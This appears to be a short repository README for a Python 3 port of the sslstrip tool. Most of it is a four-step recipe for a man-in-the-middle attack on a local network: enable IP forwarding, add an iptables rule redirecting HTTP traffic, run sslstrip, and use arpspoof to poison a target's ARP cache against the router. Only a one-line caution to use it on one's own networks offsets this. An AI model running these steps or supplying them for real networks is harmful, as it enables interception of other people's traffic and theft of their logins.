
implementation of moxie marlinspikes sslstrip im python3

Primary LanguagePython


implementation of moxie marlinspikes sslstrip im python3

Running: sslstrip can be run from the source base without installation.
Just run 'python sslstrip.py -h' as a non-root user to get the command-line options.

The four steps to getting this working (assuming you're running Linux)

1) Flip your machine into forwarding mode (as root):
   echo "1" > /proc/sys/net/ipv4/ip_forward

2) Setup iptables to intercept HTTP requests (as root):
   iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <yourListenPort>

3) Run sslstrip with the command-line options you'd like (see above).

4) Run arpspoof to redirect traffic to your machine (as root):
   arpspoof -i <yourNetworkdDevice> -t <yourTarget> <theRoutersIpAddress>

more info on moxies github


dont forget to remove the iptables config afterwards


ssl stripping is prohibited, only try this on your own machines and networks. Hello, I am a comment!